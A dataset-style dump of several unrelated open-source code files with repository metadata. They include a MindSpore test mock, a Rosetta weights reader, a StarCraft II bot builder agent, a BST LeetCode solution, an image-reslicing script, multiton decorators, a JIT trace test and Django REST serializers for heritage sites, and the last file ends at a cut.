e9ca77146ed2bffe1b60cd117932ccb63e35a1f2 | 1,719 | py | Python | tests/utils/mindspore/nn/cell.py | fapbatista/mindinsight | db5769eb80cbd13a2a9af7682c11f5667d8bf141 | [
"Apache-2.0"
] | 216 | 2020-03-28T02:11:56.000Z | 2022-03-31T06:20:09.000Z | tests/utils/mindspore/nn/cell.py | fapbatista/mindinsight | db5769eb80cbd13a2a9af7682c11f5667d8bf141 | [
"Apache-2.0"
] | 13 | 2020-03-31T03:00:12.000Z | 2021-01-03T13:01:06.000Z | tests/utils/mindspore/nn/cell.py | fapbatista/mindinsight | db5769eb80cbd13a2a9af7682c11f5667d8bf141 | [
"Apache-2.0"
] | 21 | 2020-03-28T02:41:06.000Z | 2021-11-24T12:20:25.000Z | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Mock the MindSpore mindspore/train/callback.py."""
from collections import OrderedDict
class Cell:
"""Mock the Cell class."""
@property
def auto_prefix(self):
"""The property of auto_prefix."""
return self._auto_prefix
@property
def pips(self):
"""The property of pips."""
return self._pips
class WithLossCell(Cell):
"""Mocked WithLossCell class."""
class TrainOneStepWithLossScaleCell(Cell):
"""Mocked TrainOneStepWithLossScaleCell."""
| 31.254545 | 78 | 0.658522 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Mock the MindSpore mindspore/train/callback.py."""
from collections import OrderedDict
class Cell:
"""Mock the Cell class."""
def __init__(self, auto_prefix=True, pips=None):
if pips is None:
pips = dict()
self._cells = OrderedDict()
self._auto_prefix = auto_prefix
self._pips = pips
@property
def auto_prefix(self):
"""The property of auto_prefix."""
return self._auto_prefix
@property
def pips(self):
"""The property of pips."""
return self._pips
class WithLossCell(Cell):
"""Mocked WithLossCell class."""
def __init__(self, backbone, loss_fn):
super(WithLossCell, self).__init__()
self._backbone = backbone
self._loss_fn = loss_fn
class TrainOneStepWithLossScaleCell(Cell):
"""Mocked TrainOneStepWithLossScaleCell."""
def __init__(self, network=None, optimizer=None):
super(TrainOneStepWithLossScaleCell, self).__init__()
self.network = network
self.optimizer = optimizer
| 464 | 0 | 80 |
dd72cf24d5f1b4236d53dfa74ea8753ce33e368d | 1,605 | py | Python | rosettautil/rosetta/weights.py | decarboxy/py_protein_utils | 4cbb5d6d3cf32d4240e0dc9b17e4330775663de0 | [
"MIT"
] | 10 | 2015-10-07T08:43:56.000Z | 2020-11-11T16:53:06.000Z | rosettautil/rosetta/weights.py | decarboxy/py_protein_utils | 4cbb5d6d3cf32d4240e0dc9b17e4330775663de0 | [
"MIT"
] | null | null | null | rosettautil/rosetta/weights.py | decarboxy/py_protein_utils | 4cbb5d6d3cf32d4240e0dc9b17e4330775663de0 | [
"MIT"
] | 3 | 2017-02-06T17:55:14.000Z | 2020-09-01T02:00:35.000Z | from rosettautil.util import fileutil
aa_codes_in_order = ["ALA","CYS","ASP","GLU","PHE","GLY","HIS","ILE","LYS","LEU","MET","ASN","PRO","GLN","ARG","SER","THR","VAL","TRP","TYR"]
| 33.4375 | 141 | 0.568224 | from rosettautil.util import fileutil
aa_codes_in_order = ["ALA","CYS","ASP","GLU","PHE","GLY","HIS","ILE","LYS","LEU","MET","ASN","PRO","GLN","ARG","SER","THR","VAL","TRP","TYR"]
class WeightFile:
def __init__(self):
self.ref_energies = {}
self.weights = {}
def read_file(self,filename):
self.ref_energies = {}
self.weights = {}
in_file = fileutil.universal_open(filename,'rU')
for line in in_file:
line = line.split()
if line[0] == "METHOD_WEIGHTS":
#Reference energies are ordered by 1 letter name
for aa, value in zip(aa_codes_in_order,line[2:len(line)]):
self.ref_energies[aa] = float(value)
else:
self.weights[line[0]] = float(line[1])
in_file.close()
def write_file(self,filename):
out_file = fileutil.universal_open(filename,'w')
#write reference energies
out_file.write("METHOD_WEIGHTS\tref")
for key in aa_codes_in_order:
out_file.write("\t"+str(self.ref_energies[key]))
out_file.write("\n")
#write the other weights
for key in self.weights:
out_file.write(key+"\t"+str(self.weights[key])+"\n")
out_file.close()
def get_ref(self,aa):
return self.ref_energies[aa]
def get_weight(self,term):
return self.weights[term]
def set_ref(self,aa,value):
self.ref_energies[aa] = value
def set_weight(self,term,value):
self.weights[term] = value
| 1,199 | -4 | 230 |
9d0df4002773c9b26be27fbcbcc0c6e20aec5740 | 9,347 | py | Python | bot/starpruuuft/agents/builder.py | PruuuGames/StarPruuuft | 865bc7f897ccb97d1ca4334ea7a1621a38285a35 | [
"MIT"
] | 1 | 2018-07-07T08:09:44.000Z | 2018-07-07T08:09:44.000Z | bot/starpruuuft/agents/builder.py | PruuuGames/StarPruuuft | 865bc7f897ccb97d1ca4334ea7a1621a38285a35 | [
"MIT"
] | null | null | null | bot/starpruuuft/agents/builder.py | PruuuGames/StarPruuuft | 865bc7f897ccb97d1ca4334ea7a1621a38285a35 | [
"MIT"
] | 2 | 2018-07-07T20:32:14.000Z | 2018-07-08T22:09:37.000Z | from sc2.constants import *
from sc2.position import Point2
from bot.starpruuuft.agent_message import AgentMessage
from .agent import Agent
from .. import utilities
# Reconhece um depot localizado na rampa
# Faz o cache da localização dos depots de rampa
| 40.995614 | 119 | 0.650476 | from sc2.constants import *
from sc2.position import Point2
from bot.starpruuuft.agent_message import AgentMessage
from .agent import Agent
from .. import utilities
class BuilderAgent(Agent):
def __init__(self, bot):
super().__init__(bot)
self.add_message_handler(AgentMessage.ENEMIES_CLOSE, self._handle_enemies_near)
self._tracked_depots = []
self._depots_locations = None
self._geyser_locations = None
self._supply_depots_raised = False
self._supply_depot_count = 0
self._refineries = None
self._barracks_clear = None
self._barracks_tech = None
self._barracks_reactor = None
self._factory_clear = None
self._factory_tech = None
self._starport_clear = None
self._starport_reactor = None
self._marine = 0
self._notified = False
async def on_step(self, bot, iteration):
# Roda apenas uma vez
if self._depots_locations is None:
self._setup_depos(bot)
# Caso não exista CC, o agente não faz nada
cc = utilities.get_command_center(bot)
if cc is None:
return
if self._geyser_locations is None:
vgs = bot.state.vespene_geyser.closer_than(10.0, cc)
self._geyser_locations = [vg.position.to2 for vg in vgs]
if self._barracks_clear is not None and not self._notified:
self._notified = True
self.send("BaseAgent", AgentMessage.BARRACKS_READY)
await self._build_supply_depot(bot, cc)
await self._build_refinery(bot, cc)
await self._build_barracks(bot, cc)
await self._build_barracks_tech(bot)
await self._build_barracks_reactor(bot)
await self._build_factory(bot)
await self._build_factory_tech(bot)
await self._build_starport(bot)
await self._build_starport_reactor(bot)
# Reconhece um depot localizado na rampa
def _handle_enemies_near(self, *args):
self._supply_depots_raised = args[0]
# Faz o cache da localização dos depots de rampa
def _setup_depos(self, bot):
self._depots_locations = [
Point2((max({p.x for p in d}), min({p.y for p in d})))
for d in bot.main_base_ramp.top_wall_depos
]
def is_ramp_supply_depot(self, depot):
return min([depot.position.to2.distance_to(depot_location) for depot_location in self._depots_locations]) <= 2
async def _build_supply_depot(self, bot, cc):
depots = bot.get_units([UnitTypeId.SUPPLYDEPOT, UnitTypeId.SUPPLYDEPOTLOWERED])
depot_count = depots.amount
# Marca os supply depots recém finalizados
not_tracked_depots = [depot for depot in depots if depot.tag not in self._tracked_depots]
for depot in not_tracked_depots:
self._tracked_depots.append(depot.tag)
if self.is_ramp_supply_depot(depot):
self.send("StrategyAgent", AgentMessage.RAMP_SUPPLY_DEPOT, depot.tag)
# Ajusta o estado do supply depot de acordo com a presença de inimigos
if self._supply_depots_raised and depot.type_id is UnitTypeId.SUPPLYDEPOTLOWERED:
await bot.do(depot(AbilityId.MORPH_SUPPLYDEPOT_RAISE))
elif not self._supply_depots_raised and depot.type_id is UnitTypeId.SUPPLYDEPOT:
await bot.do(depot(AbilityId.MORPH_SUPPLYDEPOT_LOWER))
elif depot.type_id == UnitTypeId.SUPPLYDEPOT:
# Supply depots que não estão na rampa devem estar abaixados
await bot.do(depot(AbilityId.MORPH_SUPPLYDEPOT_LOWER))
# Caso já existam quarteis, é necessário fechar a rampa com os 3 depots. Caso contrário, apenas 1
enough_depots = depot_count >= 1
if self._barracks_clear is not None or self._barracks_tech is not None:
enough_depots = depot_count >= 3
if enough_depots and bot.supply_left > 5:
return
# Constroi um supply depot
if bot.already_pending(UnitTypeId.SUPPLYDEPOT) < 1 and bot.can_afford(UnitTypeId.SUPPLYDEPOT):
if depot_count < len(self._depots_locations):
depot_location = list(self._depots_locations)[depot_count]
await bot.build(UnitTypeId.SUPPLYDEPOT, near=depot_location, max_distance=2, placement_step=1)
else:
await bot.build(UnitTypeId.SUPPLYDEPOT, near=cc.position.towards(
bot.game_info.map_center, -20))
async def _build_refinery(self, bot, cc):
if self._refineries.amount >= 2:
return
if self._refineries.amount == 1 and self._barracks_clear is None and self._barracks_tech is None:
return
# Permite a construção de até 2 refinarias por vez
if bot.can_afford(UnitTypeId.REFINERY):
vgs = bot.state.vespene_geyser.closer_than(10.0, cc)
for vg in vgs:
if bot.units(UnitTypeId.REFINERY).closer_than(1.0, vg).exists:
break
worker = bot.select_build_worker(vg.position)
if worker is None:
break
await bot.do(worker.build(UnitTypeId.REFINERY, vg))
break
async def _build_barracks(self, bot, cc):
if self._barracks_clear is not None:
return
if self._supply_depot_count < 1:
return
if self._barracks_tech is not None and self._starport_reactor is None:
return
if self._barracks_tech is not None and self._barracks_reactor is not None:
return
if bot.already_pending(UnitTypeId.BARRACKS) < 1 and bot.can_afford(UnitTypeId.BARRACKS):
if self._barracks_tech is None:
position = utilities.get_center_relative_position(bot, cc, 3.5)
else:
position = utilities.get_center_relative_position(bot, cc, 7.5)
await bot.build(UnitTypeId.BARRACKS, near=position)
async def _build_barracks_tech(self, bot):
if self._barracks_tech is not None or self._barracks_clear is None:
return
if self._barracks_clear is None:
return
if bot.already_pending(UnitTypeId.BARRACKSTECHLAB) < 1 and bot.can_afford(UnitTypeId.BARRACKSTECHLAB):
await bot.do(self._barracks_clear.build(UnitTypeId.BARRACKSTECHLAB))
async def _build_barracks_reactor(self, bot):
if self._barracks_reactor is not None or self._barracks_clear is None:
return
if self._starport_reactor is None:
return
if bot.already_pending(UnitTypeId.BARRACKSREACTOR) < 1 and bot.can_afford(UnitTypeId.BARRACKSREACTOR):
await bot.do(self._barracks_clear.build(UnitTypeId.BARRACKSREACTOR))
async def _build_factory(self, bot):
if self._factory_clear is not None or self._factory_tech is not None:
return
if self._barracks_tech is None:
return
if bot.already_pending(UnitTypeId.FACTORY) < 1 and bot.can_afford(UnitTypeId.FACTORY):
position = utilities.get_center_relative_position(bot, self._geyser_locations[0], 4)
await bot.build(UnitTypeId.FACTORY, near=position)
async def _build_factory_tech(self, bot):
if self._factory_tech is not None:
return
if self._factory_clear is None:
return
if bot.already_pending(UnitTypeId.FACTORYTECHLAB) < 1 and bot.can_afford(UnitTypeId.FACTORYTECHLAB):
await bot.do(self._factory_clear.build(UnitTypeId.FACTORYTECHLAB))
async def _build_starport(self, bot):
if self._starport_clear is not None or self._starport_reactor is not None:
return
if self._factory_clear is None or self._barracks_tech is None:
return
if bot.already_pending(UnitTypeId.STARPORT) < 1 and bot.can_afford(UnitTypeId.STARPORT):
position = utilities.get_center_relative_position(bot, self._geyser_locations[1], 4)
await bot.build(UnitTypeId.STARPORT, near=position)
async def _build_starport_reactor(self, bot):
if self._starport_reactor is not None:
return
if self._starport_clear is None:
return
if bot.already_pending(UnitTypeId.STARPORTREACTOR) < 1 and bot.can_afford(UnitTypeId.STARPORTREACTOR):
await bot.do(self._starport_clear.build(UnitTypeId.STARPORTREACTOR))
def _cache(self, bot):
self._barracks_clear, self._barracks_tech, self._barracks_reactor = utilities.get_barracks(bot)
self._factory_clear, self._factory_tech = utilities.get_factory(bot)
self._starport_clear, self._starport_reactor = utilities.get_starport(bot)
self._supply_depot_count = bot.get_units([UnitTypeId.SUPPLYDEPOT, UnitTypeId.SUPPLYDEPOTLOWERED]).amount
self._refineries = bot.get_units(UnitTypeId.REFINERY) | bot.get_units(UnitTypeId.REFINERY, ready=False)
self._marine = bot.get_units(UnitTypeId.MARINE).amount
| 8,623 | 5 | 454 |
3d754a59567807b87116dad0f01ccd707b41b83e | 1,234 | py | Python | Leetcode/Solutions/Data-Structure/BST/BST_To_Greater_Tree.py | fakecoinbase/sweetpandslashAlgorithms | 9641e31320f17c6393b7746312c4b030a7faf015 | [
"MIT"
] | 3 | 2021-04-21T07:11:33.000Z | 2022-01-09T00:05:55.000Z | Leetcode/Solutions/Data-Structure/BST/BST_To_Greater_Tree.py | sweetpand/Algorithms | 2e4dcf2d42de25531fae5b4ec0d96ce100043117 | [
"MIT"
] | null | null | null | Leetcode/Solutions/Data-Structure/BST/BST_To_Greater_Tree.py | sweetpand/Algorithms | 2e4dcf2d42de25531fae5b4ec0d96ce100043117 | [
"MIT"
] | null | null | null | from _DATATYPES import TreeNode
#Question: Given a Binary Search Tree (BST), convert it to a Greater Tree such that every key of the original BST is changed to the original key plus sum of all keys greater than the original key in BST.
#Solution: Traverse reverse in order, keep count of sums and adjust each node as needed
#Difficulty: Easy
#Note: Due to Python scoping restrictions, var s needs to be in a class to be accessed by a recusive function
main()
| 41.133333 | 203 | 0.669368 | from _DATATYPES import TreeNode
#Question: Given a Binary Search Tree (BST), convert it to a Greater Tree such that every key of the original BST is changed to the original key plus sum of all keys greater than the original key in BST.
#Solution: Traverse reverse in order, keep count of sums and adjust each node as needed
#Difficulty: Easy
#Note: Due to Python scoping restrictions, var s needs to be in a class to be accessed by a recusive function
class Solution(object):
sumCount = 0
def convertBST(self, root):
#Recursive helper to traverse reverse in order
def reverseInOrder(r):
#Go to right-most element
if r.right: reverseInOrder(r.right)
#Set its value to be the current sum, and update current sum to be its (old) value
r.val, self.sumCount = r.val + self.sumCount, self.sumCount + r.val
#Go to left node if exists
if r.left: reverseInOrder(r.left)
#Run recursive helper
reverseInOrder(root)
#Return root because alorithm is in-place
return root
def main():
t = TreeNode(5)
t.left = TreeNode(2)
t.right = TreeNode(13)
x = Solution()
print(t.printInOrder(t))
main()
| 680 | 45 | 50 |
8ed9d98f22c3a8ee19702f3bce74fcc5516af642 | 1,326 | py | Python | tests/test_reslice_coarse.py | shuohan/improc3d | 178b91a73a8bb2fabf73ea2a6e9562c39a8299ca | [
"MIT"
] | null | null | null | tests/test_reslice_coarse.py | shuohan/improc3d | 178b91a73a8bb2fabf73ea2a6e9562c39a8299ca | [
"MIT"
] | null | null | null | tests/test_reslice_coarse.py | shuohan/improc3d | 178b91a73a8bb2fabf73ea2a6e9562c39a8299ca | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import numpy as np
import nibabel as nib
import matplotlib.pyplot as plt
from improc3d.reslice import reslice3d, reslice3d_coarse
from improc3d.reslice import transform_to_axial
from improc3d.reslice import transform_to_coronal
from improc3d.reslice import transform_to_sagittal
obj = nib.load('image1.nii.gz')
image = obj.get_data()
affine = obj.affine
print(image.shape)
print(np.round(affine))
axial_c = transform_to_axial(image, affine, coarse=True)
coronal_c = transform_to_coronal(image, affine, coarse=True)
sagittal_c = transform_to_sagittal(image, affine, coarse=True)
LPIm = reslice3d(image, affine)
axial = transform_to_axial(LPIm, np.eye(4), coarse=True)
coronal = transform_to_coronal(LPIm, np.eye(4), coarse=True)
sagittal = transform_to_sagittal(LPIm, np.eye(4), coarse=True)
images = (image, axial_c, axial, coronal_c, coronal, sagittal_c, sagittal)
plt.figure()
for i, im in enumerate(images):
im = np.transpose(im, axes=[1, 0, 2])
plt.subplot(3, len(images), len(images) * 0 + i + 1)
plt.imshow(im[:, :, im.shape[2]//2], cmap='gray')
plt.subplot(3, len(images), len(images) * 1 + i + 1)
plt.imshow(im[:, im.shape[1]//2, :], cmap='gray')
plt.subplot(3, len(images), len(images) * 2 + i + 1)
plt.imshow(im[im.shape[0]//2, :, :], cmap='gray')
plt.show()
| 34 | 74 | 0.718703 | #!/usr/bin/env python
import numpy as np
import nibabel as nib
import matplotlib.pyplot as plt
from improc3d.reslice import reslice3d, reslice3d_coarse
from improc3d.reslice import transform_to_axial
from improc3d.reslice import transform_to_coronal
from improc3d.reslice import transform_to_sagittal
obj = nib.load('image1.nii.gz')
image = obj.get_data()
affine = obj.affine
print(image.shape)
print(np.round(affine))
axial_c = transform_to_axial(image, affine, coarse=True)
coronal_c = transform_to_coronal(image, affine, coarse=True)
sagittal_c = transform_to_sagittal(image, affine, coarse=True)
LPIm = reslice3d(image, affine)
axial = transform_to_axial(LPIm, np.eye(4), coarse=True)
coronal = transform_to_coronal(LPIm, np.eye(4), coarse=True)
sagittal = transform_to_sagittal(LPIm, np.eye(4), coarse=True)
images = (image, axial_c, axial, coronal_c, coronal, sagittal_c, sagittal)
plt.figure()
for i, im in enumerate(images):
im = np.transpose(im, axes=[1, 0, 2])
plt.subplot(3, len(images), len(images) * 0 + i + 1)
plt.imshow(im[:, :, im.shape[2]//2], cmap='gray')
plt.subplot(3, len(images), len(images) * 1 + i + 1)
plt.imshow(im[:, im.shape[1]//2, :], cmap='gray')
plt.subplot(3, len(images), len(images) * 2 + i + 1)
plt.imshow(im[im.shape[0]//2, :, :], cmap='gray')
plt.show()
| 0 | 0 | 0 |
abb207c40a13077c4462b4d2420e15888efa25b3 | 2,353 | py | Python | tests/jit/test_array.py | mswart/topaz | 4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae | [
"BSD-3-Clause"
] | 1 | 2016-07-17T09:59:55.000Z | 2016-07-17T09:59:55.000Z | tests/jit/test_array.py | mswart/topaz | 4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae | [
"BSD-3-Clause"
] | null | null | null | tests/jit/test_array.py | mswart/topaz | 4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae | [
"BSD-3-Clause"
] | null | null | null | from .base import BaseJITTest
| 50.06383 | 131 | 0.634509 | from .base import BaseJITTest
class TestArray(BaseJITTest):
def test_subscript_assign_simple(self, topaz, tmpdir):
traces = self.run(topaz, tmpdir, """
arr = [false]
10000.times { arr[0] = true }
""")
self.assert_matches(traces[0].loop, """
label(p0, p1, p3, p4, p5, p6, p7, p8, p10, p13, i69, p21, p24, p26, p28, i40, p37, p51, p66, descr=TargetToken(4310782200))
debug_merge_point(0, 0, 'times at LOAD_DEREF')
debug_merge_point(0, 0, 'times at LOAD_SELF')
debug_merge_point(0, 0, 'times at SEND')
setfield_gc(p28, 42, descr=<FieldS topaz.executioncontext.ExecutionContext.inst_last_instr 24>)
guard_not_invalidated(descr=<Guard0x100fe5d30>)
p72 = force_token()
i73 = int_lt(i69, i40)
guard_true(i73, descr=<Guard0x100fe5cb8>)
debug_merge_point(0, 0, 'times at JUMP_IF_FALSE')
debug_merge_point(0, 0, 'times at LOAD_DEREF')
debug_merge_point(0, 0, 'times at YIELD')
p74 = force_token()
debug_merge_point(1, 1, 'block in <main> at LOAD_DEREF')
debug_merge_point(1, 1, 'block in <main> at LOAD_CONST')
debug_merge_point(1, 1, 'block in <main> at BUILD_ARRAY')
debug_merge_point(1, 1, 'block in <main> at LOAD_CONST')
debug_merge_point(1, 1, 'block in <main> at BUILD_ARRAY')
debug_merge_point(1, 1, 'block in <main> at SEND_SPLAT')
p75 = force_token()
debug_merge_point(1, 1, 'block in <main> at RETURN')
debug_merge_point(0, 0, 'times at DISCARD_TOP')
debug_merge_point(0, 0, 'times at LOAD_DEREF')
debug_merge_point(0, 0, 'times at LOAD_CONST')
debug_merge_point(0, 0, 'times at SEND')
p76 = force_token()
i77 = int_add(i69, 1)
debug_merge_point(0, 0, 'times at STORE_DEREF')
debug_merge_point(0, 0, 'times at DISCARD_TOP')
debug_merge_point(0, 0, 'times at JUMP')
debug_merge_point(0, 0, 'times at LOAD_DEREF')
setfield_gc(p28, 63, descr=<FieldS topaz.executioncontext.ExecutionContext.inst_last_instr 24>)
i78 = arraylen_gc(p51, descr=<ArrayP 8>)
i79 = arraylen_gc(p66, descr=<ArrayP 8>)
jump(p0, p1, p3, p4, p5, p6, p7, p8, p10, p13, i77, p21, p24, p26, p28, i40, p37, p51, p66, descr=TargetToken(4310782200))
""")
| 2,265 | 8 | 49 |
36cdd3c7289e7770798e8bfc35319a23737ceb61 | 135 | py | Python | atcoder_abc_abc124_d_400_handstand/src/gdbrc.py | miyagaw61/procon | fc00fb9f86dc24df97897a132382243525822500 | [
"MIT"
] | null | null | null | atcoder_abc_abc124_d_400_handstand/src/gdbrc.py | miyagaw61/procon | fc00fb9f86dc24df97897a132382243525822500 | [
"MIT"
] | null | null | null | atcoder_abc_abc124_d_400_handstand/src/gdbrc.py | miyagaw61/procon | fc00fb9f86dc24df97897a132382243525822500 | [
"MIT"
] | null | null | null | e = Exgdb()
c = ExgdbCmd()
#c.b('atcoder_abc_abc124_d_handstand::main')
c.b('main.rs:82')
gdb.execute('run')
gdb.execute('layout src')
| 19.285714 | 44 | 0.688889 | e = Exgdb()
c = ExgdbCmd()
#c.b('atcoder_abc_abc124_d_handstand::main')
c.b('main.rs:82')
gdb.execute('run')
gdb.execute('layout src')
| 0 | 0 | 0 |
5b1b776111a0fefa74b895cad563314d46989830 | 472 | py | Python | profileqc/routines/dependencies.py | sharksmhi/profileqc | dfc96445231ce1974be11536cf839299e908d231 | [
"MIT"
] | null | null | null | profileqc/routines/dependencies.py | sharksmhi/profileqc | dfc96445231ce1974be11536cf839299e908d231 | [
"MIT"
] | 1 | 2022-03-30T09:10:12.000Z | 2022-03-30T09:10:12.000Z | profileqc/routines/dependencies.py | sharksmhi/profileqc | dfc96445231ce1974be11536cf839299e908d231 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2022 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-07-08 13:19
@author: a002028
"""
class Dependencies:
"""Doc."""
def __init__(self, **kwargs):
"""Initiate."""
# TODO: what to do here?
# maybe it´s enough with the dependencies
# listed in DEV_dependencies.yaml ?
pass
| 23.6 | 79 | 0.639831 | #!/usr/bin/env python
# Copyright (c) 2022 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-07-08 13:19
@author: a002028
"""
class Dependencies:
"""Doc."""
def __init__(self, **kwargs):
"""Initiate."""
# TODO: what to do here?
# maybe it´s enough with the dependencies
# listed in DEV_dependencies.yaml ?
pass
| 0 | 0 | 0 |
77ff4f6c72e6b02b94290f2cb8fba003ddf0c962 | 1,727 | py | Python | arte/utils/multiton.py | ArcetriAdaptiveOptics/arte | 3d21ae59ba6490be3f52c7957f259097bb42f511 | [
"MIT"
] | 1 | 2021-01-11T20:01:29.000Z | 2021-01-11T20:01:29.000Z | arte/utils/multiton.py | ArcetriAdaptiveOptics/arte | 3d21ae59ba6490be3f52c7957f259097bb42f511 | [
"MIT"
] | 22 | 2020-04-15T15:48:14.000Z | 2021-07-09T07:57:37.000Z | arte/utils/multiton.py | ArcetriAdaptiveOptics/arte | 3d21ae59ba6490be3f52c7957f259097bb42f511 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#########################################################
#
# who when what
# -------- ---------- ---------------------------------
# apuglisi 2019-09-28 Created
#
#########################################################
def multiton(cls):
'''
Multiton decorator
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
All parameters must be able to be passed to str() in order
to build an hashable key.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
return getinstance
def multiton_id(cls):
'''
Multiton decorator for mutable types
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
Similar to "multiton", but uses the id of each argument
to build an hashable key. This allows to pass things
like dictionaries that will be recognized as identical even
if their contents change, but risks not recognizing identical
values of strings and numbers.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
return getinstance
| 29.271186 | 65 | 0.583671 | # -*- coding: utf-8 -*-
#########################################################
#
# who when what
# -------- ---------- ---------------------------------
# apuglisi 2019-09-28 Created
#
#########################################################
def multiton(cls):
'''
Multiton decorator
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
All parameters must be able to be passed to str() in order
to build an hashable key.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
def getinstance(*args):
key = '.'.join(map(str, args))
if key not in instances:
instances[key] = cls(*(args[1:]))
return instances[key]
return getinstance
def multiton_id(cls):
'''
Multiton decorator for mutable types
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
Similar to "multiton", but uses the id of each argument
to build an hashable key. This allows to pass things
like dictionaries that will be recognized as identical even
if their contents change, but risks not recognizing identical
values of strings and numbers.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
def getinstance(*args):
ids = [str(id(x)) for x in args]
key = '.'.join(ids)
if key not in instances:
instances[key] = cls(*(args[1:]))
return instances[key]
return getinstance
| 330 | 0 | 54 |
fc0cc9e4c6a73709f706f03f4933cd141b3b0f40 | 7,208 | py | Python | api/serializers.py | yuanlii/heritagesites | 2087882fcb8a928de18fbf1a4bef89b61a80aa05 | [
"MIT"
] | 1 | 2019-09-13T20:12:43.000Z | 2019-09-13T20:12:43.000Z | api/serializers.py | yuanlii/heritagesites | 2087882fcb8a928de18fbf1a4bef89b61a80aa05 | [
"MIT"
] | null | null | null | api/serializers.py | yuanlii/heritagesites | 2087882fcb8a928de18fbf1a4bef89b61a80aa05 | [
"MIT"
] | 7 | 2019-08-02T14:37:40.000Z | 2021-01-29T18:43:40.000Z | from heritagesites.models import CountryArea, DevStatus, HeritageSite, HeritageSiteCategory, \
HeritageSiteJurisdiction, Location, Planet, Region, SubRegion, IntermediateRegion
from rest_framework import response, serializers, status
| 26.895522 | 94 | 0.765261 | from heritagesites.models import CountryArea, DevStatus, HeritageSite, HeritageSiteCategory, \
HeritageSiteJurisdiction, Location, Planet, Region, SubRegion, IntermediateRegion
from rest_framework import response, serializers, status
class PlanetSerializer(serializers.ModelSerializer):
class Meta:
model = Planet
fields = ('planet_id', 'planet_name', 'unsd_name')
class RegionSerializer(serializers.ModelSerializer):
class Meta:
model = Region
fields = ('region_id', 'region_name', 'planet_id')
class SubRegionSerializer(serializers.ModelSerializer):
class Meta:
model = SubRegion
fields = ('sub_region_id', 'sub_region_name', 'region_id')
class IntermediateRegionSerializer(serializers.ModelSerializer):
class Meta:
model = IntermediateRegion
fields = ('intermediate_region_id', 'intermediate_region_name', 'sub_region_id')
class LocationSerializer(serializers.ModelSerializer):
planet = PlanetSerializer(many=False, read_only=True)
region = RegionSerializer(many=False, read_only=True)
sub_region = SubRegionSerializer(many=False, read_only=True)
intermediate_region = IntermediateRegionSerializer(many=False, read_only=True)
class Meta:
model = Location
fields = ('location_id', 'planet', 'region', 'sub_region', 'intermediate_region')
class DevStatusSerializer(serializers.ModelSerializer):
class Meta:
model = DevStatus
fields = ('dev_status_id', 'dev_status_name')
class CountryAreaSerializer(serializers.ModelSerializer):
dev_status = DevStatusSerializer(many=False, read_only=True)
location = LocationSerializer(many=False, read_only=True)
class Meta:
model = CountryArea
fields = (
'country_area_id',
'country_area_name',
'm49_code',
'iso_alpha3_code',
'dev_status',
'location')
class HeritageSiteCategorySerializer(serializers.ModelSerializer):
class Meta:
model = HeritageSiteCategory
fields = ('category_id', 'category_name')
class HeritageSiteJurisdictionSerializer(serializers.ModelSerializer):
heritage_site_id = serializers.ReadOnlyField(source='heritage_site.heritage_site_id')
country_area_id = serializers.ReadOnlyField(source='country_area.country_area_id')
class Meta:
model = HeritageSiteJurisdiction
fields = ('heritage_site_id', 'country_area_id')
class HeritageSiteSerializer(serializers.ModelSerializer):
site_name = serializers.CharField(
allow_blank=False,
max_length=255
)
description = serializers.CharField(
allow_blank=False
)
justification = serializers.CharField(
allow_blank=True
)
date_inscribed = serializers.IntegerField(
allow_null=True
)
longitude = serializers.DecimalField(
allow_null=True,
max_digits=11,
decimal_places=8)
latitude = serializers.DecimalField(
allow_null=True,
max_digits=10,
decimal_places=8
)
area_hectares = serializers.FloatField(
allow_null=True
)
transboundary = serializers.IntegerField(
allow_null=False
)
heritage_site_category = HeritageSiteCategorySerializer(
many=False,
read_only=True
)
heritage_site_category_id = serializers.PrimaryKeyRelatedField(
allow_null=False,
many=False,
write_only=True,
queryset=HeritageSiteCategory.objects.all(),
source='heritage_site_category'
)
heritage_site_jurisdiction = HeritageSiteJurisdictionSerializer(
source='heritage_site_jurisdiction_set', # Note use of _set
many=True,
read_only=True
)
jurisdiction_ids = serializers.PrimaryKeyRelatedField(
many=True,
write_only=True,
queryset=CountryArea.objects.all(),
source='heritage_site_jurisdiction'
)
class Meta:
model = HeritageSite
fields = (
'heritage_site_id',
'site_name',
'description',
'justification',
'date_inscribed',
'longitude',
'latitude',
'area_hectares',
'transboundary',
'heritage_site_category',
'heritage_site_category_id',
'heritage_site_jurisdiction',
'jurisdiction_ids'
)
'''
def get_jurisdictions(self, obj):
"""
obj is a HeritageSite instance.
:param obj:
:return: list of dictionaries
"""
queryset = HeritageSiteJurisdiction.objects.filter(heritage_site=obj)
print(queryset)
